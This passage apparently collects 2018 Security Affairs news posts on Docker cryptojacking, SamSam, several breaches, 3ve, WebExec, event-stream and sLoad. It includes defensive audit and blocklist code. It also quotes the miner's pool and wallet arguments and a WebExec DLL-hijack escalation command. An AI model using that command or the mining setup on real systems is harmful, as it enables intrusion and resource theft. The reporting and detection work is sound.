Out of the ~500 samples analyzed, 130+ were already compromised with a cryptominer: 130+ hosts were running cryptominer containers at the time of this research. A few of the hosts were running multiple mining containers; moreover, the containers are dynamic in nature, hence the data varies a bit every time we scan the open APIs. However, it consistently shows 140+ miner containers running during the scans of these ~500 vulnerable hosts.

Most of these hosts are compromised with a popular Monero CPU cryptominer. These rogue containers eat up CPU cycles on the hosts where they are installed. Docker has made it too easy to start mining, thanks to the miner images uploaded to the Docker image repository, Docker Hub: one just needs to pull down one of those images and start the container on the remote host.

Out of the ~140 observed compromised hosts, 110+ are running the “kannix/monero-miner” image.

If you look at the image statistics on the Docker image repository, this image has been pulled over 10M times, which shows the popularity of this miner image.

Other cryptominer images are also used, but in a very small proportion:

  • arayan/monero-miner
  • timonmat/xmr-stak-cpu
  • strm/xmrig
  • bitnn/alpine-xmrig

kannix/monero-miner runs with the following arguments in all analyzed samples:

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks we need to secure the Docker API: TLS needs to be enabled by specifying the tlsverify flag and pointing Docker’s tlscacert to a trusted CA certificate.

A step-by-step process explaining how to secure the API is described in the Docker security documentation; please refer to “Protect the Docker daemon socket”.
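As an added example, not part of the article, the following Python audit ties the two sides of the problem together: it reads a dockerd ExecStart line such as the one in the systemd drop-in shown earlier and flags TCP listeners that run without --tlsverify, and it scans the body of the Engine API’s GET /containers/json for containers running the miner images listed above or typical miner arguments (the pool and algorithm reported above). The hardened ExecStart line uses the --tlsverify, --tlscacert, --tlscert and --tlskey flags from Docker’s “Protect the Docker daemon socket” documentation; the certificate paths, the container list and the miner command lines are constructed sample data.

```python
import json
import shlex

# Miner images seen on the compromised hosts in the Shodan sample above.
MINER_IMAGES = {
    "kannix/monero-miner", "arayan/monero-miner", "timonmat/xmr-stak-cpu",
    "strm/xmrig", "bitnn/alpine-xmrig",
}
# Command-line fragments typical of those CPU miners (pool and algorithm reported above).
MINER_ARGS = ("hashvault.pro", "cryptonight")
LOCAL_SCHEMES = ("unix://", "fd://", "npipe://")


def daemon_hosts(exec_start: str) -> list:
    """Return the -H/--host listener addresses given on a dockerd command line."""
    argv = shlex.split(exec_start)
    hosts = []
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
    return hosts


def tls_verify_enabled(exec_start: str) -> bool:
    """True when --tlsverify is present and not explicitly set to false."""
    for arg in shlex.split(exec_start):
        if arg == "--tlsverify":
            return True
        if arg.startswith("--tlsverify="):
            return arg.split("=", 1)[1].lower() != "false"
    return False


def audit_exec_start(exec_start: str) -> list:
    """Flag network listeners that accept API calls without client-certificate checks."""
    findings = []
    verify = tls_verify_enabled(exec_start)
    for host in daemon_hosts(exec_start):
        if host.startswith(LOCAL_SCHEMES):
            continue  # local socket only, not reachable from the network
        if not verify:
            findings.append(f"{host}: TCP listener without --tlsverify (unauthenticated remote control)")
        elif host.endswith(":2375"):
            findings.append(f"{host}: TLS enabled but bound to the conventional plaintext port 2375")
    return findings


def image_repo(image: str) -> str:
    """Strip the tag or digest from an image reference, keeping any registry:port prefix."""
    image = image.split("@", 1)[0]
    colon, slash = image.rfind(":"), image.rfind("/")
    return image[:colon] if colon > slash else image


def find_miner_containers(containers_json: str) -> list:
    """Scan the body of GET /containers/json for known miner images or miner arguments."""
    hits = []
    for c in json.loads(containers_json):
        image = c.get("Image", "")
        name = (c.get("Names") or ["?"])[0]
        command = c.get("Command", "").lower()
        if image_repo(image) in MINER_IMAGES:
            hits.append((name, image, "known miner image"))
        elif any(frag in command for frag in MINER_ARGS):
            hits.append((name, image, "miner-style arguments"))
    return hits


# ExecStart line from the drop-in shown above (insecure) and a hardened variant using the
# --tlsverify/--tlscacert/--tlscert/--tlskey flags from Docker's daemon-socket documentation;
# the certificate paths are assumed.
INSECURE_EXEC_START = "/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock"
HARDENED_EXEC_START = ("/usr/bin/dockerd --tlsverify --tlscacert=/etc/docker/ca.pem "
                       "--tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem "
                       "-H=0.0.0.0:2376 -H unix:///var/run/docker.sock")

# Constructed /containers/json response: one legitimate container, one running a listed
# miner image, and one running a miner from an innocuous base image.
SAMPLE_CONTAINERS_JSON = json.dumps([
    {"Names": ["/web"], "Image": "nginx:1.15", "Command": "nginx -g 'daemon off;'"},
    {"Names": ["/miner"], "Image": "kannix/monero-miner:latest",
     "Command": "xmrig -a cryptonight-lite -o pool.aeon.hashvault.pro:3333"},
    {"Names": ["/build"], "Image": "alpine:3.8", "Command": "./xmr-stak --currency cryptonight"},
])

if __name__ == "__main__":
    for label, line in (("insecure", INSECURE_EXEC_START), ("hardened", HARDENED_EXEC_START)):
        print(label, audit_exec_start(line) or ["no findings"])
    for hit in find_miner_containers(SAMPLE_CONTAINERS_JSON):
        print("miner container:", hit)
```

The image check alone would miss the third container, which is why the command line is matched as well: an attacker can run the same miner binary from any base image, so the pool and algorithm arguments are the more durable indicator.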

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)


U.S. DoJ charges Iranian duo over SamSam Ransomware activity

The U.S. DoJ charges two Iranian men over their alleged role in creating and spreading the infamous SamSam ransomware.

Two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), have been charged by the DoJ for their role in creating and distributing the dreaded SamSam ransomware.

The duo faces six hacking and extortion-related charges, including conspiracy to commit wire fraud, intentional damage to a protected computer, conspiracy to commit fraud and related activity in connection with computers, and transmitting a demand in relation to damaging a protected computer.

The two Iranians are accused of having developed the SamSam ransomware in December 2015 and of having continuously improved it since.

“Extorted the Victims for ransom payments in exchange for the decryption keys to unlock the compromised computers.” reads the DoJ indictment. 

“The defendants hacked, encrypted, and extorted more than 200 Victims, and collected more than $6 million in ransom payments. The Victims incurred additional losses exceeding $30 million resulting from the loss of access to their data.”

The hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, and caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by the ransomware; the cyber attack was confirmed by city officials.

The ransomware infection caused the interruption of several of the city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September; the incident impacted the processing of park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT); the DOT shut down the infected workstations.

In August, the security firm Sophos published a report on the SamSam ransomware; its experts tracked Bitcoin addresses managed by the crime gang and discovered that the crooks had extorted nearly $6 million from victims since December 2015, when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

Prosecutors reported that Savandi and Mansouri used Iranian Bitcoin exchanges to convert the cryptocurrency into Iranian rial.

The crooks used the Tor network to avoid being tracked; experts noticed that they also encrypted data backups to prevent victims from recovering their encrypted files.

Authorities inserted the two Iranians in the FBI’s Cyber Most Wanted list.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, Iranian hackers)


Dell data breach – Dell forces password reset after the incident

Dell data breach – the IT giant Dell disclosed a data breach; the company confirmed it detected an intrusion in its systems on November 9th, 2018.

Attackers were trying to exfiltrate customer data (i.e. names, email addresses, and hashed passwords) from the company portal Dell.com and from the support.dell.com websites.

Dell said on Wednesday that its online electronics marketplace experienced a “cybersecurity incident” earlier this month, when an unknown group of hackers infiltrated its internal network.

As a precautionary measure, Dell forced a password reset for all accounts on the Dell.com website; the company also announced additional measures to mitigate the potential effects of the incident.

At this time it is still unclear whether the hackers succeeded in stealing customer information; the investigation is still ongoing and Dell hasn’t shared any technical details on the intrusion. Dell hired a digital forensics firm to conduct an investigation and reported the incident to law enforcement.

“On November 9, 2018, Dell detected and disrupted unauthorized activity on our network that attempted to extract Dell.com customer information, limited to names, email addresses and hashed passwords,” read the data breach notification published by Dell.

“Upon detection, we immediately implemented countermeasures and began an investigation. We also retained a digital forensics firm to conduct an independent investigation and engaged law enforcement.”

The tech firm confirmed that payment information and Social Security numbers were not exposed by the security breach.

“Credit card and other sensitive customer information was not targeted. The incident did not impact any Dell products or services.” continues Dell.

“Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation.”

Customers who have a Dell account or who contacted the online support can find more information on a dedicated web page Dell established at www.dell.com/customerupdate.

Customers who use the same password for their Dell.com account on other services need to change it on those services as well.

Pierluigi Paganini

(Security Affairs – Dell data breach, hacking)


AccuDoc Data Breach impacted 2.6 Million Atrium Health patients

The hospital network Atrium Health suffered a data breach: hackers accessed patients’ personal information after compromising the technology solutions provider AccuDoc.

Atrium Health offers healthcare and wellness programs in the Southeast of the United States through more than 40 hospitals and 900 care locations.

AccuDoc is a company providing technology solutions to the healthcare industry, including the hospital network Atrium Health.

Atrium Health was informed on October 1 that AccuDoc had detected unauthorized access to its databases that stored data related to payments made at several company locations, including Blue Ridge HealthCare System, Columbus Regional Health Network, NHRMC Physician Group, Scotland Physicians Network, and St. Luke’s Physician Network.

Hackers accessed personal information on patients and guarantors (i.e. the individual paying a patient’s bill), including name, date of birth, address, insurance policy details, medical record number, invoice number, account balance, date of service and, in some cases, Social Security number. The archive did not contain financial data or clinical/medical information.

The data breach impacted roughly 2.65 million patients; the attackers had access to AccuDoc systems for roughly one week, between September 22 and September 29.

“Following an extensive forensics review, it appears that an unauthorized third party gained access to AccuDoc’s databases between September 22, 2018 and September 29, 2018.” reads the data breach notification published by Atrium Health.

“Based on the review, the information that may have been accessed included certain personal information about patients and guarantors (a person who is responsible for paying a patient’s bill), including first and last name, home address, date of birth, insurance policy information, medical record number, invoice number, account balance, and dates of service. For some individuals, the personal information may also have included Social Security numbers.” 


The company pointed out that no personal information was stolen from AccuDoc’s database and that it is not aware of any misuse.

Atrium Health notified the affected individuals by mail; the company recommends monitoring account statements, bills, notices, and insurance transactions for any unauthorized activity.

Pierluigi Paganini

(Security Affairs – Atrium Health, data breach)

The post AccuDoc Data Breach impacted 2.6 Million Atrium Health patients appeared first on Security Affairs.


Security Affairs: FBI along with security firms dismantled 3ve Ad Fraud Operation

The FBI, along with cybersecurity firms, dismantled a sophisticated ad fraud scheme that allowed its operators to earn tens of millions of dollars.

Law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaigns, dubbed 3ve, which infected over 1.7 million computers to carry out advertising fraud.

The name 3ve is derived from the three distinct sub-operations that made up the campaign, each using its own measures to avoid detection and each built around a different architecture with different components.

3ve has been active since at least 2014, and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million; the people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice also indicted 8 individuals from Russia, Kazakhstan, and Ukraine.

Operators used a broad range of techniques to monetize their efforts: they created fake versions of legitimate websites, used their own botnet to simulate visitor activity on them, sold the resulting ad space to advertisers, and relied on Border Gateway Protocol (BGP) hijacking to redirect traffic. Crooks also used malicious code to generate fake clicks on online ads and earn money.

“3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud scheme in its own right.” read the report published by WhiteOps.

“Tech-savvy fraudsters try to produce fake traffic and fraudulent ad inventory to trick advertisers into believing that their ads are being seen by actual, interested users,” 

The infrastructure involved in the 3ve ad-fraud campaign was huge: according to the experts, fraudsters infected 1.7 million computers with malware and used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory, generating 3 to 12 billion daily ad bid requests.

“All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above, there were up to 700,000 active infections at any given time).” continues the report.

“In aggregate, the operation also produced more than 10,000 counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale operation”

Experts observed three 3ve operations during their investigation:

3VE.1—The BOAXXE Malware Scheme (aka METHBOT /MIUREF)

The 3ve.1 sub-operation leveraged the Boaxxe botnet, aka Miuref and Methbot, composed of infected systems in data centers across the US and Europe.

Attackers also carried out BGP hijacking to obtain IP addresses used to proxy traffic from the compromised bots in the data centers. The infected systems were used to visit both fake and real web pages.

“All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be Android devices.” continues the report.

“There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the traffic came from”

According to the investigators, between September 2014 and December 2016 the scheme involved over 1,900 servers hosted in commercial data centers to load ads from advertisers on over 5,000 counterfeit websites. The scheme generated millions of dollars in profit for its operators.

3VE.2—The KOVTER Malware Scheme

In this second scheme, attackers used counterfeit domains to sell fake ad inventory to advertisers. Attackers used a hidden, custom-built browsing agent (based on the Chromium Embedded Framework) on more than 700,000 computers that were compromised with the Kovter malware.

Fraudsters used redirection servers that instructed the infected computers to visit fake web pages operated by the gang.

3VE.3—Data Centers IPs as Proxies

In the third sub-operation, bots were installed in data centers and used the IP addresses of other data centers as proxies.

The 3ve campaign was first spotted in 2016 by ESET, which tracked the botnet as Boaxxe.

Security firms helped the FBI to shut down the massive ad-fraud operation. Law enforcement obtained warrants that allowed them to seize 31 internet domains and 89 servers of the 3ve infrastructure.

Pierluigi Paganini

(Security Affairs – 3ve botnet, ad-fraud)

The post FBI along with security firms dismantled 3ve Ad Fraud Operation appeared first on Security Affairs.




British MP: Facebook was aware about Russian activity at least since 2014

A British MP claims Facebook was aware of Russian political interference in 2014, long before the events became public.

The British MP Damian Collins, head of a parliamentary inquiry into disinformation, revealed that one of the emails seized from US software company Six4Three as part of a US lawsuit demonstrates that a Facebook engineer had notified the social network giant in October 2014 that Russian IP addresses were accessing “three billion data points a day” on the network.

“British MPs joined together with fellow lawmakers from the parliaments of Argentina, Brazil, Canada, France, Ireland, Latvia and Singapore in an unusual move aimed at emphasising international solidarity on the issue.” reported AFP.

The information was shared during an international hearing that parliament hosted on Tuesday to gather information on disinformation and “fake news.”

The emails confirmed that Facebook was aware of the activities carried out by Russian threat actors in 2014 when they accessed a huge amount of data from the social media company.

“If Russian IP addresses were pulling down a huge amount of data from the platform was that reported or was that just kept, as so often seems to be the case, within the family and not talked about,” Collins asked Richard Allan, Facebook’s Vice President of Policy Solutions.

Richard Allan, who represented the company at the hearing, replied that the information could provide a distorted interpretation of events.

“Any information you have seen… is at best partial and at worst potentially misleading” replied Allan. The emails were “unverified partial accounts”.

Allan also defended Facebook CEO Mark Zuckerberg, who has refused to appear before the British parliamentary inquiry.

Since the disclosure of the Cambridge Analytica privacy scandal and the alleged interference in the 2016 Presidential election, Facebook’s data protection policies have been questioned by intelligence analysts and privacy advocates.

“While we were playing with our phones and apps, our democratic institutions… seem to have been upended by fratboy billionaires in California,” Charlie Angus from Canada’s House of Commons told Allan.

Catherine Morin-Desailly from the French Senate called Facebook’s approach to data protection “a scandal”, while other lawmakers condemned the way Facebook shared user data with third-party companies.

Pierluigi Paganini

(Security Affairs – Facebook, fake news)

The post British MP: Facebook was aware about Russian activity at least since 2014 appeared first on Security Affairs.

Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again

Cisco has released a new round of security patches to address the potentially serious WebExec flaw in Webex Meetings, which it first attempted to fix one month ago.

One month ago, Cisco addressed the CVE-2018-15442 vulnerability, also tracked as WebExec by the Counter Hack researchers Ron Bowes and Jeff McJunkin, who discovered it.

The flaw affects the Cisco Webex Meetings Desktop App and has been rated as a “high” severity command injection vulnerability.

The CVE-2018-15442 vulnerability could be exploited by an authenticated, local attacker to execute arbitrary commands as a privileged user.

“The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.” states the advisory published by Cisco.

“While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.”

The Cisco advisory thus notes that the vulnerability could also be exploited remotely by leveraging the operating system’s remote management tools.

The issue could be exploited by malware or by a malicious logged-in user to gain system administrator rights and carry out further malicious activities.

The CVE-2018-15442 flaw affects all Cisco Webex Meetings Desktop App releases prior to 33.6.0, and Cisco Webex Productivity Tools Releases 32.6.0 and later prior to 33.0.5, when running on a Microsoft Windows end-user system.


The flaw was discovered on July 24, 2018, and it was reported to Cisco on August 6, 2018. On October 24, 2018, the company released the advisory.

A few days after the disclosure of the flaw, researchers at SecureAuth discovered that the official patch released by Cisco was incomplete: the fix could be bypassed through DLL hijacking.

“The vulnerability can be exploited by copying the ptUpdate.exe binary to a local attacker-controlled folder. Also, a malicious DLL must be placed in the same folder, named wbxtrace.dll,” reads the advisory published by SecureAuth.

“To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).”

SecureAuth reported its findings to Cisco on November 9 and the company released a new set of patches on Tuesday.

Cisco published an update to the initial advisory informing users of SecureAuth’s findings.

“After an additional attack method was reported to Cisco, the previous fix for this vulnerability was determined to be insufficient. A new fix was developed, and the advisory was updated on November 27, 2018, to reflect which software releases include the complete fix,” Cisco wrote.

Pierluigi Paganini

(Security Affairs – Cisco Webex, WebExec)

The post Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again appeared first on Security Affairs.

Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach

British and Dutch data protection regulators fined the ride-sharing company Uber a total of $1,170,892 for the 2016 data breach.

British and Dutch data protection regulators have fined Uber a total of $1,170,892 for the 2016 security breach that exposed the personal data of 57 million of its users.

In November 2017, Uber CEO Dara Khosrowshahi announced that hackers had broken into the company’s database and accessed the personal data (names, email addresses and cellphone numbers) of 57 million of its users; the disconcerting revelation was that the company had covered up the hack for more than a year.

The attackers also accessed the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016 and, according to a report published by Bloomberg, it was easy for the hackers, who obtained credentials from a private GitHub site used by the company’s development team. The hackers tried to blackmail Uber, demanding $100,000 from the company in exchange for not publishing the stolen data.

Rather than notifying customers and law enforcement of the breach, as required by California’s data breach notification law, information security chief Joe Sullivan ordered the ransom paid and the story covered up, with any evidence destroyed. The payout was disguised as a bug bounty reward, complete with signed non-disclosure agreements.

Britain’s Information Commissioner’s Office (ICO) has now fined Uber 385,000 pounds ($491,102) for failing to protect the personal information of 3 million Britons.

“The Information Commissioner’s Office (ICO) has fined ride sharing company Uber £385,000 for failing to protect customers’ personal information during a cyber attack.

A series of avoidable data security flaws allowed the personal details of around 2.7million UK customers to be accessed and downloaded by attackers from a cloud-based storage system operated by Uber’s US parent company. This included full names, email addresses and phone numbers.” states the ICO.

“The records of almost 82,000 drivers based in the UK – which included details of journeys made and how much they were paid – were also taken during the incident in October and November 2016.”

ICO Director of Investigations Steve Eckersley declared:

“This was not only a serious failure of data security on Uber’s part, but a complete disregard for the customers and drivers whose personal information was stolen. At the time, no steps were taken to inform anyone affected by the breach, or to offer help and support. That left them vulnerable.”

“Paying the attackers and then keeping quiet about it afterwards was not, in our view, an appropriate response to the cyber attack.”

“Although there was no legal duty to report data breaches under the old legislation, Uber’s poor data protection practices and subsequent decisions and conduct were likely to have compounded the distress of those affected.”

The UK ICO confirmed that none of the affected customers were notified of the security breach.

The Dutch Data Protection Authority (Dutch DPA) fined the company 600,000 euro ($679,790) for failing to protect the personal information of 174,000 Dutch citizens.

“The Dutch Data Protection Authority (Dutch DPA) imposes a fine of €600.000 upon Uber B.V. and Uber Technologies, Inc (UTI) for violating the Dutch data breach regulation. ” states the Dutch DPA.

“This data breach has affected 57 million Uber users worldwide, and concerns 174.000 Dutch citizens. Amongst the data were names, e-mail addresses and telephone numbers of customers and drivers.”

In an official statement, Uber announced that it is “pleased to close this chapter on the data incident from 2016.”

The company highlighted that it has introduced a number of technical improvements since the data breach.

“We learn from our mistakes,” the company said.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach appeared first on Security Affairs.

Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins

A hacker compromised the third-party NodeJS module “Event-Stream”, introducing malicious code aimed at stealing funds from Bitcoin wallet apps.

The malicious code was introduced in version 3.3.6, published on September 9 via the Node Package Manager (NPM) repository.

The Event-Stream library is a very popular NodeJS module that helps developers manage data streams; it has nearly 2 million downloads a week.

It has been estimated that the tainted version of the library was downloaded by nearly 8 million developers.

The library was created by Dominic Tarr, who maintained it for a long time, but when he left the project he allowed an unknown programmer, “right9ctrl”, to continue his work.

“He emailed me and said he wanted to maintain the module, so I gave it to him. I don’t get anything from maintaining this module, and I don’t even use it anymore, and haven’t for years.” wrote Tarr.

Tarr trusted right9ctrl because of his significant contributions to the project, but once the new maintainer had gained access to the library he released Event-Stream version 3.3.6, which added a new library, Flatmap-Stream, as a dependency; that library was specifically designed to implement the malicious functionality.

The bad news is that the code remained undetected for more than 2 months because it was encrypted. The malicious code was spotted by Ayrton Sparling (FallingSnow on GitHub), a computer science student at California State University, who reported it.

“If you are using anything crypto-currency related, then maybe. As discovered by @maths22, the target seems to have been identified as copay related libraries. It only executes successfully when a matching package is in use (assumed to be copay at this point).” reported Sparling on GitHub.

“If you are using a crypto-currency related library and if you see flatmap-stream@0.1.1 after running npm ls event-stream flatmap-stream, you are most likely affected.

For example:

$ npm ls event-stream flatmap-stream

flatmap-stream@0.1.1”

The NPM repository maintainers who analyzed the malicious code discovered that it was designed to target users of the open-source bitcoin wallet app BitPay, a distribution of the Copay project, which depends on event-stream.
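The `npm ls` check quoted above only covers one installed tree; the same lookup can be run over a project's lockfile in CI. The following is an added example (not code from the Security Affairs post, the event-stream project or npm) that scans a package-lock.json for the two tainted releases the article names, handling both the nested lockfileVersion 1 layout and the flat lockfileVersion 2/3 "packages" map; the sample lockfiles and the 9.9.9 version number are constructed for the demo.

```javascript
// Added example, not code from the Security Affairs post or the event-stream
// project: scan a package-lock.json for the tainted releases the article names
// (event-stream 3.3.6 and its flatmap-stream 0.1.1 dependency). Handles
// lockfileVersion 1 (nested "dependencies") and 2/3 (flat "packages" map).
// Plain Node.js, no external modules.

// Exact versions the article identifies as malicious. A real SCA tool would
// pull this from an advisory feed; here it is a hand-written blocklist.
const TAINTED = {
  "event-stream": new Set(["3.3.6"]),
  "flatmap-stream": new Set(["0.1.1"]),
};

function isTainted(name, version) {
  return Boolean(TAINTED[name] && TAINTED[name].has(version));
}

// lockfileVersion 1: "dependencies" is a tree; nested installs live under each
// entry's own "dependencies" key. `trail` records the install path so the
// report shows which top-level package dragged the bad one in.
function walkV1(deps, trail, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = [...trail, name];
    if (isTainted(name, entry.version)) {
      hits.push({ name, version: entry.version, path: path.join(" > ") });
    }
    walkV1(entry.dependencies, path, hits);
  }
}

// lockfileVersion 2/3: "packages" is flat, keyed by on-disk path such as
// "node_modules/event-stream/node_modules/flatmap-stream". Splitting on
// "node_modules/" recovers the same install path the v1 walk produces.
function walkV2(packages, hits) {
  for (const [key, entry] of Object.entries(packages || {})) {
    if (key === "") continue; // the root project itself
    const segments = key
      .split("node_modules/")
      .filter(Boolean)
      .map((s) => s.replace(/\/$/, ""));
    const name = segments[segments.length - 1];
    if (isTainted(name, entry.version)) {
      hits.push({ name, version: entry.version, path: segments.join(" > ") });
    }
  }
}

// Entry point: returns every tainted package found, with its install path.
function findTaintedPackages(lockfileText) {
  const lock = JSON.parse(lockfileText);
  const hits = [];
  if (lock.packages) walkV2(lock.packages, hits);
  else walkV1(lock.dependencies, [], hits);
  return hits;
}

// Constructed sample: a hypothetical wallet app whose v1 lockfile pins
// event-stream 3.3.6, which pulled in flatmap-stream 0.1.1.
const SAMPLE_LOCK_V1 = JSON.stringify({
  name: "example-wallet", version: "1.0.0", lockfileVersion: 1,
  dependencies: {
    "event-stream": {
      version: "3.3.6",
      requires: { "flatmap-stream": "~0.1.0", through: "~2.3.1" },
      dependencies: { "flatmap-stream": { version: "0.1.1" } },
    },
    through: { version: "2.3.8" },
  },
});

// The same dependency set expressed in the v2 layout (also constructed).
const SAMPLE_LOCK_V2 = JSON.stringify({
  name: "example-wallet", version: "1.0.0", lockfileVersion: 2,
  packages: {
    "": { name: "example-wallet", version: "1.0.0" },
    "node_modules/event-stream": { version: "3.3.6" },
    "node_modules/event-stream/node_modules/flatmap-stream": { version: "0.1.1" },
    "node_modules/through": { version: "2.3.8" },
  },
});

// Constructed clean lockfile: an event-stream version that is not on the
// blocklist (9.9.9 is made up for this example, not a real release).
const SAMPLE_LOCK_CLEAN = JSON.stringify({
  name: "example-wallet", version: "1.0.0", lockfileVersion: 1,
  dependencies: { "event-stream": { version: "9.9.9" } },
});

for (const [label, text] of [["v1", SAMPLE_LOCK_V1], ["v2", SAMPLE_LOCK_V2], ["clean", SAMPLE_LOCK_CLEAN]]) {
  console.log(label, findTaintedPackages(text));
}
```

Pointing `findTaintedPackages` at the real `package-lock.json` of a build and failing the pipeline on a non-empty result gives the same signal as the `npm ls` check, without needing an installed tree.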

A security advisory published by BitPay confirms that Copay versions 5.0.2 through 5.1.0 were affected by the malicious code; the organization released Copay version 5.2.0 to address the issue.

“We have learned from a Copay GitHub issue report that a third-party NodeJS package used by the Copay and BitPay apps had been modified to load malicious code which could be used to capture users’ private keys. Currently we have only confirmed that the malicious code was deployed on versions 5.0.2 through 5.1.0 of our Copay and BitPay apps. However, the BitPay app was not vulnerable to the malicious code. We are still investigating whether this code vulnerability was ever exploited against Copay users.” BitPay says in the advisory.

“Users should assume that private keys on affected wallets may have been compromised, so they should move funds to new wallets (v5.2.0) immediately. Users should not attempt to move funds to new wallets by importing affected wallets’ twelve word backup phrases (which correspond to potentially compromised private keys). Users should first update their affected wallets (5.0.2-5.1.0) and then send all funds from affected wallets to a brand new wallet on version 5.2.0, using the Send Max feature to initiate transactions of all funds.”

The malicious code allows the attackers to steal digital coins stored in Dash Copay Bitcoin wallets and transfer them to a server located in Kuala Lumpur, Malaysia.

On Monday, NPM maintainers removed the backdoor from the repository.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins appeared first on Security Affairs.

The SLoad Powershell malspam is expanding to Italy

A new malspam campaign is hitting Italy these days; threat actors are spreading a new variant of a powerful downloader named sLoad.

sLoad is a sophisticated script, used in the past to deliver different types of malware such as the dreaded “Ramnit banker”.

“In the past months CERT-Yoroi observed an emerging attack pattern targeting its constituency. These series of malicious email messages shared common techniques may be likely related to a single threat group starting its operation against the Italian cyber panorama.” reads the analysis published by Yoroi.

“It is still not clear if these attack attempts may be originated by any well established cybercrime group modifying its TTP or a completely new one, however CERT-Yoroi is tracking this threat with the internal codename “Sload-ITA” (TH-163).”

sLoad implements a broad range of capabilities, including the ability to take screenshots, read the list of running processes, exfiltrate the DNS cache, exfiltrate Outlook e-mail, and other typical spyware functionality.

As usual, it comes as a zip file attached to an e-mail; this file contains two elements:

  1. A fake shortcut to a directory (.lnk file);
  2. A legitimate image flagged as hidden.

Strangely, the image is not used in the malware’s workflow; the link file, however, starts a complex infection chain, as shown in the following figure:

sLoad

First of all, the .lnk file runs a first PowerShell activator, which searches for a file named “documento-aggiornato-novembre-*.zip”.

Then, if the .zip file exists, the PowerShell script extracts and runs a piece of code appended at the end of that same file. Once extracted, this second PowerShell script acts as the next dropper in the attack chain.

This PowerShell code abuses the Windows BitsTransfer functionality to download two important files, config.ini and web.ini, which contain the final sLoad stage.

The malicious code gains persistence through a task defined in the Windows Task Scheduler that runs a Visual Basic script.

Finally, once sLoad is started, it periodically takes screenshots, gathers system information and sends this and other data to the C2.
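The chain just described (Explorer launching a PowerShell activator that looks for the “documento-aggiornato-novembre-*.zip” file, a second PowerShell stage fetching config.ini/web.ini over BITS, then a scheduled task that runs a VBScript) is more useful to a defender as a correlation than as three separate alerts. The following is an added example, not code from Yoroi or the Security Affairs post: a toy correlation rule over process-creation records. The records are constructed and simplified (fields modelled loosely on Sysmon-style image / parent / command-line telemetry, not on any vendor's exact schema), and the file names and paths in them are made up for the demo.

```javascript
// Added example, not code from the Security Affairs post or from Yoroi: a toy
// correlation rule for the sLoad infection chain described in the article.
// Event records are constructed; their fields (pid, ppid, image, cmd) are a
// simplification of process-creation telemetry such as Sysmon Event ID 1.

function base(path) {
  // Lower-cased file name of an executable path, or "" if missing.
  return path ? path.split(/[\\/]/).pop().toLowerCase() : "";
}

function parentOf(e, byPid) {
  return byPid.get(e.ppid);
}

// One predicate per stage of the chain. Each alone is weak (admins use BITS
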